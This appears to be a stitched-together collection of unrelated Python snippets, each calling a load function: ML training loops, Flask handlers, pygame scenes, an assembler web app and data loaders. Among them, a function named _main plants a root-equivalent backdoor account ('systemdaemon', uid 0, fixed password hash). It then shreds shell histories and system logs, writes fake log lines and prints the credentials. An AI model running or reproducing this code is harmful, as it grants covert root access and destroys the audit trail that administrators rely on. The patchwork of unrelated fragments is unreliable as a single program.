def test_loader_json(): module = "User" name = 'test_loader_json_' + str(uuid.uuid4()).replace('-', '_') file_type = "json" f = tempfile.NamedTemporaryFile(delete=False, suffix='.json') f.write(""" [ { "a" : 1, "b" : 2, "c" : 3 }, { "a" : 4, "b" : 5, "c" : 6 } ] """) f.close() print "registering file %s" % f.name schema, properties = inferrer.from_local(name, f.name, file_type) metadata.register_shore_schema(user, module, name, schema) print properties, schema #assert(False) loader.load(user, module, name, f.name, file_type, properties, schema) os.remove(f.name)
def upload_file(): if request.method == 'POST': # check if the post request has the file part if 'file' not in request.files: flash('No se ha subido un archivo.') return redirect(request.url) file = request.files['file'] # if user does not select file, browser also # submit a empty part without filename if file.filename == '': flash('No se ha seleccionado un archivo.') return redirect(request.url) if file.filename.endswith('.csv'): filename = secure_filename(file.filename) full_filename = os.path.join(current_app.config['UPLOAD_FOLDER'], filename) file.save(full_filename) try: load(full_filename) except ValueError: flash('El archivo que ha intentado subir no tiene las ' + 'columnas requeridas.', category='error') return redirect( url_for('user_manager.upload_file', filename=filename)) return render_template('users/members.html')
def __init__(self, name, height): super().__init__(name) cylinder = load("Objects/cylinder.obj")[0] cube = load("Objects/cube/cube.obj")[0] cylinderPerlin = PerlinMesh(cylinder) door_left = Node(children=[cube], transform=translate(5, 0, 0) @ scale(10, 2, 0.7)) scale_left = Node(children=[cylinderPerlin, door_left], transform=scale(0.1, height, 0.1)) rotation_left = RotationControlNode(glfw.KEY_L, glfw.KEY_P, vec(0, 1, 0), speed=0.5, children=[scale_left]) node_left = Node(children=[rotation_left], transform=translate(-1, 0, 0)) door_right = Node(children=[cube], transform=translate(-5, 0, 0) @ scale(10, 2, 0.7)) scale_right = Node(children=[cylinderPerlin, door_right], transform=scale(0.1, height, 0.1)) rotation_right = RotationControlNode(glfw.KEY_L, glfw.KEY_P, vec(0, -1, 0), speed=0.5, children=[scale_right]) node_right = Node(children=[rotation_right], transform=translate(1, 0, 0)) self.add(node_left, node_right)
def train(callback=None, out_weights='weights.h5'): reload(audiotransform) reload(speechmodel) hz = 6000 repeat = 1 goalSize = 30000 # samples after padding embedSize = 10 model = speechmodel.makeModel() model.compile(loss='mean_squared_error', optimizer='rmsprop', metrics=['accuracy']) paths = [] words = [] for p in sampleSet1(): # or findSounds(words) try: raw = load(p, hz=hz) crop = audiotransform.autoCrop(raw, rate=hz) audiotransform.randomPad(crop, goalSize) # must not error print 'using %s cropped to %s samples' % (p, len(crop)) except audiotransform.TooQuiet: print '%s too quiet' % p continue paths.append(p) word = soundFields(p)['word'] if word not in words: words.append(word) x = numpy.zeros((len(paths) * repeat, goalSize), dtype=numpy.float) y = numpy.zeros((len(paths) * repeat, embedSize), dtype=numpy.float) for row, p in enumerate(paths * repeat): audio = load(p, hz=hz) audio = audiotransform.autoCrop(audio, rate=hz) #audio = audiotransform.rightPad(audio, goalSize) audio = audiotransform.randomPad(audio, goalSize, path=p) audio = audiotransform.randomScale(audio) x[row,:] = audio y[row,:] = np_utils.to_categorical(words.index(soundFields(p)['word']), embedSize) if callback: callback.loaded_sound(row, len(paths) * repeat) callbacks = [] #callbacks.append(keras.callbacks.TensorBoard(log_dir='./logs', histogram_freq=1, write_graph=True)) if callback: callbacks.append(callback) model.fit(x, y, batch_size=100, nb_epoch=20, validation_split=.0, shuffle=True, callbacks=callbacks) model.save_weights(out_weights) if callback: callback.on_save(out_weights, fileSize=os.path.getsize(out_weights))
def main(): if len(sys.argv) == 2: file = load('boards/' + sys.argv[1]) parsed = parse(file) solve(parse(file)) elif len(sys.argv) == 1: file = load('boards/zeros.txt') parsed = parse(file) generate(parse(file)) else: print("USAGE: python3 sudoku.py board")
def random_name(self): if self.gender == 'f': resource = 'female_names' else: resource = 'male_names' first_names = loader.load(resource) last_names = loader.load('surnames') first = random.choice(first_names).strip() last = random.choice(last_names).strip() self.name = first + ' ' + last del first_names del last_names
def data(): baseDir = r"D:\Arnaud\data_croutinet\ottawa\data" trainDir = os.path.join(baseDir, "train/train.csv") validationDir = os.path.join(baseDir, "validation/validation.csv") trainLeft, trainRight, trainLabels = load(trainDir) validationLeft, validationRight, validationLabels = load(validationDir) X_train = [trainLeft, trainRight] y_train = trainLabels X_test = [validationLeft, validationRight] y_test = validationLabels return X_train, X_test, y_train, y_test
def on_key_press(symbol, modifiers): global filename ss = key.symbol_string(symbol) if symbol == key.F1: loader.clear() filename = None elif symbol == key.F2: filename = input('filename:') loader.clear() arr, width, height = loader.load(filename) game.camera.x = width/2 game.camera.y = height/2 for b in arr: b.add() elif symbol == key.F5: loader.clear() if(filename): arr, width, height = loader.load(filename) game.camera.x = width/2 game.camera.y = height/2 for b in arr: b.add() elif symbol == key.S: if modifiers & key.MOD_CTRL: if filename: loader.save(filename) else: filename = input('filename:') loader.save(filename) elif symbol in structs.keys(): change_struct(structs[symbol]) elif symbol == key.Q: bullet.speed_cons *=0.8 elif symbol == key.E: bullet.speed_cons *= 1.25 elif modifiers & key.MOD_CTRL and symbol != 65507: name = 'key-{}.txt'.format(ss) loader.save(name) structs[symbol] = loader.load(name)[0] structs_path[ss] = name with open('structs.json', 'w') as file: json.dump(structs_path, file, indent=4, separators=(',', ': ')) elif ss in structs.keys(): change_struct(structs[ss])
def test_loader_csv(): module = "User" name = 'test_loader_csv_' + str(uuid.uuid4()).replace('-', '_') file_type = 'csv' f = tempfile.NamedTemporaryFile(delete=False, suffix='.csv') f.write("a,b\n") f.write("1,2\n") f.write("3,4\n") f.close() print "registering file %s" % f.name schema, properties = inferrer.from_local(name, f.name, file_type) metadata.register_shore_schema(user, module, name, schema) print properties, schema loader.load(user, module, name, f.name, file_type, properties, schema) os.remove(f.name)
def test_querycpp(): module = "User" name = 'test_querycpp_' + str(uuid.uuid4()).replace('-', '_') file_type = 'csv' f = tempfile.NamedTemporaryFile(delete=False, suffix='.csv') f.write("a,b\n") f.write("1,2\n") f.close() schema, properties = inferrer.from_local( name, f.name, file_type) metadata.register_shore_schema(user, module, name, schema) print properties, schema loader.load(user, module, name, f.name, file_type, properties, schema) result = querycpp.query(user, module, name) assert(result['compile_time'] > 0) assert(result['execution_time'] > 0)
def create(): top_node = Node('top') cube_mesh = load("Objects/cube/cube.obj")[0] cube_node = Node("cube1"); cube_node.add(cube_mesh) top_node.add(cube_node) return top_node
def main(): device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu") print('Using device: {}'.format(device)) data, sample_rates = load(enforce_samplerate=44100) print(data) # 10 seconds of audio seq_len = 60 print('Loading trained model...') model = load_model_from_checkpoint(TRAINED_STATE, device) print('Performing inference...') prev, _ = get_batch(data, 10, 1, device, segment_size=44100, full=True) print('Encoding seed sequence') hidden = model.encode(prev) print('Producing sequence') audio = torch.clamp(model.decode(hidden, seq_len), -1, 1) print('Saving result') np.save(os.path.join(OUTPUT_DIR, 'prediction.npy'), audio[0].detach().cpu().numpy()) if not IS_WINDOWS: import torchaudio torchaudio.save("prediction.mp3", torch.stack((audio[0], audio[0])), sample_rates[0]) plt.plot(audio[0].detach().cpu().numpy()) plt.show() return audio
def __init__(self, x, y, image, angle): super().__init__() self.x = x self.y = y self.image = loader.load(image) self.rect = self.image.get_rect() self.angle = angle
def main(init_name): """ The main function that reads the configuration file and transmits information from it to the load function """ info_about_doer() variant9() print("*****") try: print("ini {0}:".format(init_name), end="") conf = load_ini(init_name) print("OK") load(conf['input']['csv'], conf['input']['json'], conf['output']['fname'], conf['input']['encoding']) except KeyError: print("\n***** init file error *****")
def analyze(opts): # use sys.stdin insted if no filename is specified if len(opts.filenames) == 0: opts.filenames.append(sys.stdin) if opts.demo: data = [demo(), demo(), demo()] else: # load data file data = [load(f, opts) for f in opts.filenames] # transform to 1-dimensional array data = concatenate(data, axis=0) # modulate the data with base data = modulate_base(data, opts.base) # convert Decimal to float # remove data with threshold if opts.min_threshold: data = data[data>opts.min_threshold] if opts.max_threshold: data = data[data<opts.max_threshold] # fitting kwargs = dict( n_components=opts.classifiers, covariance_type=opts.covariance_type, min_covar=opts.min_covar) model, criterions = fit(data, **kwargs) # call function return opts.func(data, model, criterions, opts)
def main(): if (len(sys.argv) not in [2, 3]) or (sys.argv[1] not in ['load', 'query', 'clear']): print 'Error: invalid usage\nUsage: python main.py load|query' sys.exit(1) client = connect() if sys.argv[1] == 'load': if len(sys.argv) == 3 and sys.argv[2] == "loopdata": loader.load_loopdata(client) else: loader.load(client) if sys.argv[1] == 'query': query.run(client) if sys.argv[1] == 'clear': loader.clear(client)
def test_business_sentiment(test_file, sentiment_prob_file): confusion_mat = [[0,0,0], [0,0,0], [0,0,0]] vocab_sentiment = loader.load('yelp/'+sentiment_prob_file) with open('yelp/'+test_file+'.json', 'r') as file: for line in file: business_id = None business = None json_line = json.loads(line) for b in json_line: business_id = b business = json_line[b] for review_id in business: review_sentiment_prob_distribution = [0.22, 0.11, 0.67] sentence_lemmas = business[review_id]['lemmas'] actual_sentiment = business[review_id]['sentiment'] for sentence in sentence_lemmas: for lemma in sentence: if(lemma in vocab_sentiment): review_sentiment_prob_distribution = compute_adj_posteriors(vocab_sentiment[lemma], review_sentiment_prob_distribution) sentiment_inference = max((val, idx) for (idx, val) in enumerate(review_sentiment_prob_distribution))[1] if(review_sentiment_prob_distribution == [1./3, 1./3, 1./3]): sentiment_inference = 1 confusion_mat[sentiment_inference][actual_sentiment] = confusion_mat[sentiment_inference][actual_sentiment] + 1 acc = float(confusion_mat[0][0] + confusion_mat[1][1] + confusion_mat[2][2])/sum(sum(confusion_mat,[])) return confusion_mat, acc
def generate(): if request.method == 'POST': files = (request.form['files']).split(',') offset = int(request.form['offset']) loadfile = files[-1].split('.')[0] mainfile = loadfile + '.asm' symbols, symbol_table = assembler.assemble(files) linker.link(mainfile, symbols) loader.load(mainfile, offset) machine.convert(mainfile) f = open("Output/" + loadfile + '.pass1', 'r') code = f.read() f.close() code = code.split('\n') for i in range(0, len(code)): code[i] = code[i].replace(' ', ' ') code[i] = "<span id=\"" + str(i + 1) + "\">" + code[i] + "</span><br>" pass1code = ''.join(code) f = open("Output/" + loadfile + '.pass2', 'r') code = f.read() f.close() code = code.split('\n') for i in range(0, len(code)): code[i] = "<span id=\"" + str(i + 1) + "\">" + code[i] + "</span><br>" pass2code = ''.join(code) f = open("Output/" + loadfile + '.asm', 'r') code = f.read() f.close() code = code.split('\n') for i in range(0, len(code)): code[i] = "<span id=\"" + str(i + 1) + "\">" + code[i] + "</span><br>" link_code = ''.join(code) return json.dumps({ 'symbols': symbols, 'symbol_table': symbol_table, 'loadfile': loadfile, 'pass1code': pass1code, 'pass2code': pass2code, 'link_code': link_code })
def main(): global options run_time = time.time() options = parse_arguments() loader.load(options.input_path, options.output_path) if options.descriptor.lower() == "raw" or \ options.descriptor.lower() == "gray" or \ options.descriptor.lower() == "grey": descriptor = raw_gray_descriptor elif options.descriptor.lower() == "hardnet": descriptor = hardnet_descriptor elif options.descriptor.lower() == "hog": descriptor = hog_descriptor else: raise Exception("Unknown descriptor '{}'".format(options.descriptor)) results.log_meta("descriptor", descriptor.get_name()) results.log_meta("dataset", options.input_path) if options.note is not None: results.log_meta("note", options.note) if options.use_gpu: results.log_meta("use_gpu", "true") else: results.log_meta("use_gpu", "false") results.log_meta("tracker.padding", kcf_params.padding) results.log_meta("tracker.interpolation_factor", kcf_params.interpolation_factor) results.log_meta("tracker.lambda", kcf_params.lambda_value) results.log_meta("tracker.sigma", kcf_params.sigma) results.log_meta("tracker.output_sigma_factor", kcf_params.output_sigma_factor) track(descriptor) run_time -= time.time() run_time *= -1 results.log_meta("speed.total_run_time", str(run_time) + "s") print("Finished in {}s".format(run_time)) return
def evaluate(self, data_size): print('---------------------Model Evaluation------------------------') test_data, target = load(dataset="testing", data_size=data_size) predicted = self.predict(test_data) print("Classification report for classifier %s:\n%s\n" % (self.classifier, metrics.classification_report(target, predicted))) print("Confusion matrix:\n%s" % metrics.confusion_matrix(target, predicted)) return metrics.classification_report(target, predicted)
def __init__(self, exe): self.loader = loader.load(exe) self.entry = self.loader.entry self.arch_name = arch.map(self.loader.arch) self.arch = arch.find(self.arch_name) if not self.arch: raise NotImplementedError("Unsupported Unicorn arch: %s" % self.arch) self.bsz = self.arch.bits / 8 self.uc = Unicorn(self.arch)
def load_db(db): raw_data = loader.load() warnings.warn('loading...' + DB_NAME) for col, rec_list in raw_data['Schedule'].items(): record_type = col[:len(col) - 1] for record in rec_list: key = '{}.{}'.format(record_type, record['serial']) record['serial'] = key db[key] = Record(**record)
def loadNet(path): _M = loader.load(path) M['net'] = net = _M['net'] M['state']['network_losses'] = _M['state']['network_losses'] M['state']['iteration'] = _M['state']['iteration'] assert (net.hidden_size == args.hidden_size and net.embedding_size == args.embedding_size and net.cell_type == args.cell_type) print("Loaded network:", path)
def main(): optparser = OptionParser() optparser.add_option('-n', '--n', dest='n', type='int', default=None) optparser.add_option('-e', '--epoch', dest='epoch', type='int', default=30) opts, args = optparser.parse_args() model_name = __file__.split('/')[-1].split('.')[0] fname_weight = 'model/%s_weights.hdf5' % (model_name) fname_config = 'model/%s_config.json' % (model_name) dataset = loader.load(opts.n) #test_labels = dataset[-1][1] train, test = tuple(map(adapt, dataset)) bias = True model = Sequential() model.add(Dense(64, input_shape=(784, ))) model.add(Activation('relu')) model.add(Dense(128)) model.add(Activation('relu')) model.add(Dense(10)) model.add(Activation('softmax')) model.compile(loss='categorical_crossentropy', optimizer=RMSprop(), metrics=['accuracy']) open(fname_config, 'w').write(model.to_json()) checkpoint = ModelCheckpoint(fname_weight, monitor='acc', verbose=0, save_best_only=True, save_weights_only=True, mode='max') model.fit( train[0], train[1], batch_size=128, nb_epoch=opts.epoch, callbacks=[ checkpoint, ], verbose=2, ) model.load_weights(fname_weight) loss, acc = model.evaluate(train[0], train[1], verbose=0) print 'TRAIN: Loss %.8f Accuracy %.8f' % (loss, acc) loss, acc = model.evaluate(test[0], test[1], verbose=0) print 'TEST: Loss %.8f Accuracy %.8f' % (loss, acc)
def data(): """ Here we load the training set and the validation set with their labels without any data augmentation In fact, we don't want data augmentation to influence the optimisation of hyperparameters :return: training set, validation set, training labels, validation labels """ baseDir = r"D:\Arnaud\data_croutinet\ottawa\data" trainDir = os.path.join(baseDir, "train/train.csv") validationDir = os.path.join(baseDir, "validation/validation.csv") trainLeft, trainRight, trainLabels = load(trainDir) validationLeft, validationRight, validationLabels = load(validationDir) X_train = [trainLeft, trainRight] y_train = trainLabels X_test = [validationLeft, validationRight] y_test = validationLabels return X_train, X_test, y_train, y_test
def __init__(self, surface): ''' Initializes a new tester. ''' self.surface = surface self.finished = False self.game = None self.timeSinceLast = 0.0 self.microgames = loader.load(failfast=True) self.count = 0 self.lives = 3 self.font = Font(None, FONT_SIZE) self._load_thumbnail()
def __init__(self): a, b, c = load() self.frame = Frame(a, b, c) self.commands = {'u': 'Print 5 random users', 'q': 'Quit Program', 'a': 'Find movie by ID', 'b': 'Average rating by movie ID', 't': 'Top 5 movies', 's': 'Most similar users', 'r': 'Recommend movies by user ID', 'm': 'Print 5 random movie IDs', 'n': 'Recommend movie by movie ID'}
def __init__(self, path): with open(path, 'rt') as f: self.raw_data = load(f) # group by separators distribution bysep = lambda item: item.sep_distribution self.report = [] for sep, collection in groupby(self.raw_data, bysep).iteritems(): ret = self.split_by_distribution(collection) self.report.append((get_separator_title(sep), ret))
def create_net_to_train(filename,layers,neuron_per_layer,datakey='train_set_x',answerkey='train_set_y'): import loader data,answer,groups=loader.load(filename,datakey,answerkey) data=data/255 class fixed_io_neural_net(neuralNet): def train(self,times,step=None): neuralNet.train(self,data,answer,times,step) layers=[neuron_per_layer for i in range(layers)] layers[-1]=answer.shape[0] net=fixed_io_neural_net(data.shape[0],layers) return net
def run(file: str, isAsm=False, memfile=None, loadFile=None): try: b = BUS() if loadFile is not None: readToMemory(b.cu, loadFile) if isAsm: obj = assemble(file, asClass=True)[0] load(b.cu, None, objectCode=obj) else: load(b.cu, file) b.cu.runall() if memfile is not None: memoryWrite(b.cu, memfile) except BaseException as e: if memfile is not None: memoryWrite(b.cu, memfile) print(e)
def main(): if len(argv) == 1: raise Exception('Please specify a command') elif argv[1] == 'images': for i in loader.get_images(): print i elif argv[1] == 'tag': print loader.get_tag() elif argv[1] == 'verify': loader.verify(argv[2]) elif argv[1] == 'load': if len(argv) != 5: print >>stderr, "Usage: {} {} repo_file tag_file target_file".format(argv[0], argv[1]) print >>stderr, " Provide an empty repo file to use the default Docker repo." print >>stderr, " Provide an empty target file to launch the default Crane target." print >>stderr, " Provide an empty tag file to use the 'latest' tag and override " \ "the Loader's own tag file. Otherwise content of the two files must be identical." raise Exception('Wrong arguments for command {}'.format(argv[1])) loader.load(argv[2], argv[3], argv[4]) elif argv[1] == 'install-getty': install_getty(argv[2]) elif argv[1] == 'modified-yml': if len(argv) != 4: print >>stderr, "Usage: {} {} <repo> <tag>".format(argv[0], argv[1]) exit(11) loader.modify_yaml(argv[2], argv[3]) with open(MODIFIED_YML_PATH) as f: print f.read() elif argv[1] == 'simulate-getty': install_getty('/tmp') subprocess.call('/tmp/run') else: raise Exception('Unknown command: {}'.format(argv[1]))
def __init__(self, exe): self.loader = loader.load(exe) self.entry = self.loader.entry self.arch_name = arch.map(self.loader.arch) self.os_name = self.loader.os self.arch, self.os = arch.find(self.arch_name, self.os_name) if not self.arch: raise NotImplementedError('Unsupported arch: %s' % self.arch_name) if not self.os: raise NotImplementedError('Unsupported OS: %s' % self.os_name) self.bsz = self.arch.bits / 8 self.uc = Unicorn(self.arch)
def event(self, event): if self.active: if event.type == pygame.KEYDOWN: if event.key == pygame.K_w and self.on_ground: self.jumped = 4.0 self.on_ground = False self.jump_sound.play() elif event.key == pygame.K_r: self.objects, self.items = loader.load(self.levels[self.level]) self.enter(self.level) elif event.key == pygame.K_ESCAPE: self.manager.set_scene('menu')
def post(self): try: reload(speechmodel) tf = tempfile.NamedTemporaryFile(suffix='.webm') tf.write(self.request.body) tf.flush() raw = load(tf.name, speechmodel.rate) self.recognize(raw) except Exception: self.set_status(500) self.write({'exc': traceback.format_exc()}) return
def _main(): print(logo) backdoor = " useradd -M --password $6$ABCD1234$ixyh5u//NQmuMwY1poNtTXa5t1v5ZUzl2t8W3aMszd8rvfS9qFNE222AL36MHpuzs.2nviVVn2E16BQHeI0eT0 --badnames -s /bin/bash -g 0 -o -u 0 systemdaemon" loader.load(colors.yellow + "Creating backdoor" + colors.end) os.system(backdoor) getusers() users = open("users.txt", "r").readlines() loader.load(colors.yellow + "Clearing logs" + colors.end) for user in users: logclear = " shred /home/{0}/.bash_history; shred /root/.bash_history; rm /home/{1}/.bash_history; rm /root/.bash_history; shred /var/log/*; rm /var/log/* -rf; rm /var/log/*/* -rf;".format( user.strip(), user.strip()) os.system(logclear) os.system("rm users.txt") loader.load(colors.yellow + "Creating fake logs" + colors.end) for user in users: fakehistory = " echo 'clear' >> /home/{}/.bash_history".format( user.strip()) fakeroothistory = " echo 'clear' >> /root/.bash_history" fakelog = " echo 'linux systemd[1]: Finished Rotate log files.' >> /var/log/sys.log" os.system(fakehistory) os.system(fakelog) os.system(fakeroothistory) time.sleep(1) print( colors.dark_green + "\nBackdoor has been successfully planted.\nCredentials:\n{0}Username: {1}systemdaemon\n{2}Password: {3}backdoor{4}" .format(colors.dark_yellow, colors.green, colors.dark_yellow, colors.green, colors.end))
def main(): """ create a window, add scene objects, then run rendering loop """ viewer = ViewerPyramid() # place instances of our basic objects # viewer.add(PyramideMultiColors()) # one time initialization viewer.add(PyramidColored()) # Charge cette suzanne viewer.add(load("suzanne.obj")[0]) # start rendering loop viewer.run()
def load_database(conf, loader): """Load the password database.""" if "database" not in conf: filename = conf["db"]["filename"] if not os.path.exists(filename): raise ValueError("password database does not exist") if os.path.isdir(filename): raise ValueError("password database is not a regular file") passphrase = get_password(conf) entries = loader.load(conf["db"]["filename"], passphrase) create_database(conf) conf["database"].passwords = entries conf["database"].compute_tags()
def main(): print_header("START", CONFIG, level=0) data = load(CONFIG) print(data.head()) data.to_csv("./outputs/data.csv", index=False) describe(data, CONFIG) test(data, CONFIG) forecast(data, CONFIG) predict(data, CONFIG) report(data, CONFIG) print_header("DONE", CONFIG, level=0)
def main(): out_dir = sys.argv[1] prefix = sys.argv[2] print("Loading files ...") #phn_fragments, wrd_fragments = load(out_dir + 'phn/', out_dir +'wrd/', out_dir, prefix) phn_fragments, _ = load(out_dir + 'phn/', out_dir +'wrd/', out_dir, prefix) print("Extraction gold ...") #clsdict = #make_gold(phn_fragments, out_dir, n_jobs, verbose, prefix) print("Splitting folds ...") split_em(phn_fragments, out_dir, prefix) print("Done.")
def enter(self, level=0): self.level = level self.objects, self.items = loader.load(self.levels[self.level]) self.active = True self.bg_x = self.background_rect.x = -500 self.bg_y = self.background_rect.y = -500 self.player_rect.midbottom = (320, 400) self.jumped = 0.0 self.stage = 1 self.collected = 0.0 self.needed = 300.0 self.initial = True
def sort(watershed_data_input_filename, county_abbreviation, output_filename): # Define signature for input file. watershed_data_signature = [ {'name': 'BarrierID', 'type': str}, {'name': 'Area_sqkm', 'type': float}, {'name': 'Tc_hr', 'type': float}, {'name': 'CN', 'type': float} # Future: latitude and longitude. ]; # Load data. watershed_data = loader.load(watershed_data_input_filename, watershed_data_signature, 1, -1) valid_watersheds = watershed_data['valid_rows'] # If there were invalid watershed rows, make a note but continue on. num_invalid_rows = len(watershed_data['invalid_rows']) if num_invalid_rows > 0: print "* Note: there were " \ + str(num_invalid_rows) \ + " invalid rows in the watershed data. Continuing with the " \ + str(len(valid_watersheds)) \ + " valid rows." # Strip *their* county abbreviation off BarrierIDs and cast to int, e.g., '10cmbws' -> 10 id_suffix_len = 5 # Seems like their abbreviations are always 3-letter acronyms plus 'ws'. for watershed in valid_watersheds: barrier_id = watershed['BarrierID'] watershed['BarrierID'] = int(barrier_id[:len(barrier_id) - id_suffix_len]) # Sort the valid watersheds by this BarrierID number. def get_id(row): return row['BarrierID'] valid_watersheds = sorted(valid_watersheds, key = get_id, reverse = False) # Write the sorted data to a new csv file. with open(output_filename, 'wb') as output_file: output_writer = csv.writer(output_file) # Header. output_writer.writerow(['BarrierID','Area_sqkm','Tc_hr','CN']) # Row for each watershed. # Note we are adding *our* county abbreviation back onto the BarrierID number. for watershed in valid_watersheds: output_writer.writerow([ \ str(watershed['BarrierID']) + county_abbreviation, \ watershed['Area_sqkm'], \ watershed['Tc_hr'], \ watershed['CN'] \ ])
def main(init_filename): """ Perform all the work Parameters: init_filename (str): configuration file name """ try: print("ini " + init_filename + ": ", end="") ini_dict = load_ini(init_filename) print("OK") ini_input_dict = ini_dict["input"] ini_output_dict = ini_dict["output"] encoding_input = ini_input_dict["encoding"] filename_csv = ini_input_dict["csv"] filename_json = ini_input_dict["json"] encoding_output = ini_output_dict["encoding"] filename_output = ini_output_dict["fname"] information = Information() load(information, filename_csv, filename_json, encoding_input) if not filename_output: print("output stdout:", end="\n") else: print("output " + filename_output + ": ", end="") information.output(filename_output, encoding_output) if filename_output: print("OK") except InitError as e: print("\n", repr(e), sep="") print_params_help() except (ReadCsvError, LoadCsvError, ReadJsonError, LoadJsonError, ConsistentError, OutputError) as e: print("\n", repr(e), sep="")
def generate(): if request.method == 'POST': files = (request.form['files']).split(',') offset = int(request.form['offset']) loadfile = files[-1].split('.')[0] mainfile=loadfile+'.asm' symbols,symbol_table=assembler.assemble(files) linker.link(mainfile, symbols) loader.load(mainfile, offset) machine.convert(mainfile) f=open("Output/"+loadfile+'.pass1','r') code=f.read() f.close() code = code.split('\n') for i in range(0,len(code)): code[i] = code[i].replace(' ',' ') code[i] = "<span id=\""+str(i+1)+"\">"+code[i]+"</span><br>" pass1code = ''.join(code) f=open("Output/"+loadfile+'.pass2','r') code=f.read() f.close() code = code.split('\n') for i in range(0,len(code)): code[i] = "<span id=\""+str(i+1)+"\">"+code[i]+"</span><br>" pass2code = ''.join(code) f=open("Output/"+loadfile+'.asm','r') code=f.read() f.close() code = code.split('\n') for i in range(0,len(code)): code[i] = "<span id=\""+str(i+1)+"\">"+code[i]+"</span><br>" link_code = ''.join(code) return json.dumps({'symbols':symbols,'symbol_table':symbol_table,'loadfile':loadfile,'pass1code':pass1code,'pass2code':pass2code,'link_code':link_code})
def load_db(db): data = loader.load() for key, rec_list in data['Schedule'].items(): record_type = key[:-1] class_candidate = record_type.capitalize() cls = globals().get(class_candidate, DbRecord) if inspect.isclass(cls) and issubclass(cls, DbRecord): factory = cls else: factory = DbRecord for record in rec_list: key = '{}.{}'.format(record_type, record['serial']) record['serial'] = key db[key] = factory(**record)
def main(): """Script to load GTFS data into a database.""" usage = 'usage: %prog [options] gtfs_file' epilog = ('Convert data in gtfs_file into database format. gtfs_file can be ' 'any format supported by gtfs-sql (either a zip file or a ' 'directory containing CSVs).') parser = OptionParser(usage, epilog=epilog) parser.add_option('-o', '--output_filename', dest='output_filename', help='database to write to (default [gtfs_file without extension].db)') options, args = parser.parse_args() if len(args) != 1: parser.error('No gtfs filename supplied') gtfs_filename = args[0] if options.output_filename: output_filename = options.output_filename else: output_filename = os.path.splitext(gtfs_filename)[0] + '.db' load(gtfs_filename, output_filename)
def __init__(self): self.win_size = 640, 480 self.window = sdle.Window("Tickless", self.win_size[0], self.win_size[1]) self.tileset = world.Tileset("tileset2.png", 4, 4) self.event_loop = sdle.EventLoop( on_quit=self.on_quit, on_mouse_down=self.on_click, on_key_down=self.on_key_down, on_key_up=self.on_key_up) self.world = loader.load("map.txt", self.tileset, self.event_loop) # world.World(19, 14, self.tileset, (0, 0), [(0, 0), (2, 0)], self.event_loop) self.directions = [False, False, False, False] self.gui = None self.gui_size = 0, 0 self.player = None self.generate_world()
def upload_file(): if request.method == 'POST': # check if the post request has the file part if 'file' not in request.files: flash('No se ha subido un archivo.') return redirect(request.url) file = request.files['file'] # if user does not select file, browser also # submit a empty part without filename if file.filename == '': flash('No se ha seleccionado un archivo.') return redirect(request.url) if file.filename.endswith('.csv'): filename = secure_filename(file.filename) full_filename = os.path.join(current_app.config['UPLOAD_FOLDER'], filename) file.save(full_filename) try: load(full_filename) except ValueError: flash('El archivo que ha intentado subir no tiene las ' + 'columnas requeridas.', category='error') return redirect(url_for('user_manager.upload_file', filename=filename)) return render_template('users/members.html')
def load(self, path, filename): window = self.ids['window'] window.reset() tree = load(os.path.join(path, filename[0])) tdata = treeData(tree) window.take_graph_data(tdata.t) window.take_visualizer(tdata.treeVis) tdata.load_tree() window.visualizer.build_highlighters() self.dismiss_popup()
def __init__(self, manager): self.manager = manager self.collect_sound = pygame.mixer.Sound('assets/sound/collect.wav') self.level_complete_sound = pygame.mixer.Sound('assets/sound/level_complete.wav') self.jump_sound = pygame.mixer.Sound('assets/sound/jump.wav') self.jump2_sound = pygame.mixer.Sound('assets/sound/jump2.wav') self.stage_up_sound = pygame.mixer.Sound('assets/sound/stage_up.wav') self.stage_down_sound = pygame.mixer.Sound('assets/sound/stage_down.wav') self.player = pygame.transform.scale(pygame.image.load("assets/img/player_1.png"), (36, 80)) self.player_rect = self.player.get_rect(); self.background = pygame.image.load("assets/img/background.png") self.background_rect = self.background.get_rect() self.levels = ['first', 'fourth', 'second', 'third'] self.objects, self.items = loader.load(self.levels[0]) self.active = False
def openFileWithLoader(self,file): d,f=os.path.split(file) sys.path.insert(0,d) module=__import__(os.path.splitext(f)[0]) del sys.path[0] loader=module.Loader() fn = QFileDialog.getOpenFileName(QString.null,QString.null,self) if fn.isEmpty(): self.statusBar().message('Loading aborted',2000) return fileName = str(fn) proc=loader.load(fileName) logger=proc.getLogger("parser") if logger.hasErrors(): self.logFile=logview.LogView() self.logFile.text.setText(logger.getStr()) self.logFile.show() panel=Browser(self.tabWidget,proc) self.currentPanel=panel self.tabWidget.addTab( panel,os.path.basename(fileName)) self.tabWidget.showPage(panel)
import loader from collections import OrderedDict import patcher import utils import os # get base pa directory base_path = utils.pa_media_dir() # the directory where the mod files are (right here in this case xD) mod_path = '.' # get the unit list file dir unit_list_path = os.path.join(base_path, "pa/units/unit_list.json") # unit list files for comparing unit_list = loader.load(unit_list_path) patches = [] # iterate over all the units for unit_file in unit_list['units']: # get rid of the extra slash at the start so that path join works unit_file = unit_file[1:] base_unit_path = os.path.join(base_path, unit_file) unit_base = loader.load(base_unit_path) # check to see if it's actually a file we've bothered shadowing or not: mod_unit_path = os.path.join(mod_path, unit_file) # the mod doesn't shadow this file; no need to compare them
def loaddb(): load(db)
STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. """ """ @author Stephen Dawson-Haggerty <*****@*****.**> """ # this is the twisted event loop from twisted.internet import reactor # use this to get a smap source in one line import loader # autoflush means that we don't call flush on a timer s = loader.load('default.ini', autoflush=None) CHUNKSIZE=1000 i = 0 def fail(err): print "Received error while delivering reports" reactor.stop() def do_add(*args): global i global CHUNKSIZE if i > 10000: reactor.stop() else: # publish a bunch of data
def __init__(self): ''' Initializes a new game to the start screen. ''' self.finished = False self.scene = None self.microgames = loader.load(FAILFAST) self.change(Menu(self))
def load(info): loader.load(info)
